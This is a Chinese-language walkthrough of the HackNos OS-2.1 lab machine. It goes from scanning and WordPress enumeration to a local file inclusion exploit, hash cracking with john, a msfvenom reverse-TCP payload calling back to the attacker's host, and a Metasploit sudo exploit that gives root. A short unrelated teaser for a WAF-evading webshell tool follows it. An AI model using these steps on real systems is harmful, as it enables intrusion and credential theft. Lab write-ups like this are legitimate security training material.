OS-HACKNOS-2.1
靶机安装
先把靶机设为NAT模式,开机时一直按shift,然后按e
把框内的东西改成rw singke init=/bin/bash,然后ctrl+x进入界面,ip a看一下当前网卡是ens33
1 |
cd /etc/netplan/ |
信息搜集
nmap -sn 192.168.169.0/24 扫描当前网段得知靶机ip是192.168.169.141
nmap -sV -sC -A 192.168.169.141
发现目标开启了80 22端口,我们访问一下80端口看看有什么内容,这里访问完以后是Apache2 Ubuntu Default Page,估计网站首页是在某个目录下,我们来扫一波目录
gobuster dir -u http://192.168.169.141/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
奇怪的是使用这个字典跑不出来,换一个尝试一下
gobuster dir -u http://192.168.169.141/ -w /usr/share/wordlists/dirb/big.txt
扫描到了/tsweb目录,我们访问一下看看,使用一下这个插件,发现他是WordPress5.3的版本,这就可以使用wpscan来看看
wpscan –url http://192.168.169.141/tsweb -e vp –api-token TOKEN 这里-e是枚举,vp是易受攻击的插件选项
他是有漏洞的,CVE-2019-9618好像是,wpscan也给了文章,来看看这个https://www.exploit-db.com/exploits/46537,并且给出了poc
漏洞挖掘
这是个本地文件包含漏洞,我们使用一下poc来看看是不是能够访问
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
我们来解密试试,这里把我们要解密的东西丢到一个文件里,然后使用john解密,字典在/var/share/wordlists/下,rockyou.txt,首次使用需要进行解压,解压命令 gzip -d rockyou.txt.gz
破解命令 john –format=md5crypt –wordlist=/usr/share/wordlists/rockyou.txt 666 这里666是自己创建的文件的名字
我们这里就直接知道了flag的账号密码,可以ssh登陆,ssh [email protected],登陆成功
后渗透提权
我们可以查看一下存在的用户,cat /etc/passwd|grep bash,顺便切换成bash
接下来在/var/backups/passbkp下翻到了一个md5-hash文件,是除了flag和root用户之外的用户的密码
继续解密试试,解密方法依旧是和上面那个一样,这里直接给出吧,然后切换到这个用户
接下来就是来到他的主目录,获取user.txt下的内容
这里还是老方法,使用msf的suggester模块,来进行提权,非常的舒服,具体可以见上一个DomDom靶机的提权,这里直接给出命令
1 |
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.169.134 LPORT=4444 -f elf > payload.elf |
生成好msf马以后,在目标本机开启 python -m SimpleHTTPServer 然后进入到靶机的tmp目录下
1 |
cd /tmp |
这样就可以获得到一个meterpreter,然后background记住此时的session
1 |
post/multi/recon/local_exploit_suggester |
这里我选择了第二个exp,第一个用了打不通
1 |
use exploit/linux/local/sudo_baron_samedit |
成功获取了root权限,cat /root/root.txt,听懂掌声
6月17号,某牛在朋友圈发了消息:史上最牛逼的中国菜刀即将发布,过市面上所有的 waf,而且把 webshell 玩到让你瞠目结舌的境界当时有消息称 6 月底将会发布新版菜刀。果不其然,在 6 月 20 日,原本已经关闭的 maicaidao.com 又开放了…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论